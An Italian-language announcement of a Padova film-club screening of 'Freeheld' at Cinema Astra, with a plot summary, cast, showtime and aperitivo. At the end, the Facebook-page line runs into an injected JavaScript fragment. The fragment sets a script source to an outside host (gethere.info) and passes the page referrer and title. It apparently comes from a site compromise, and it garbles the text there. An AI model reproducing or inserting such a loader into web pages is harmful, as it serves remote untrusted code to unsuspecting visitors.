My Chica Party-Proiezione di ‘Freeheld’ al Cinema Astra di Padova

A Padova tornano le proiezioni di My Chica Party, dedicate al cinema di tematica gender. Il film in programma per questo giovedì 31 marzo è Freeheld pellicola di Peter Sollett del 2015. Come per il precedente appuntamento dell’8 marzo con Suffragette, anche stavolta a ospitare l’evento sarà il Cinema Astra di Padova e il film verrà proiettato in versione originale sottotitolata, per permettere proprio a tutti di goderne appieno.

Freeheld è ispirato ad una storia vera e racconta di Laurel Hester, detective del New Jersey, e del suo incontro con Stacie, che la porterà a rivelare e vivere in modo più libero la propria omosessualità. La coppia però si troverà presto ad affrontare la dura battaglia contro la malattia di Laurel e quella per l’ottenimento dei diritti civili come coppia di fatto. Punto di forza del film sono di certo le interpretazioni delle protagoniste Julianne Moore ed Ellen Page.

La proiezione del film è in programma per le 21:00 e verrà preceduta dal consueto aperitivo, dalle 19:30.

E per saperne di più sull’evento: ecco la pagina facebook!s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Share This: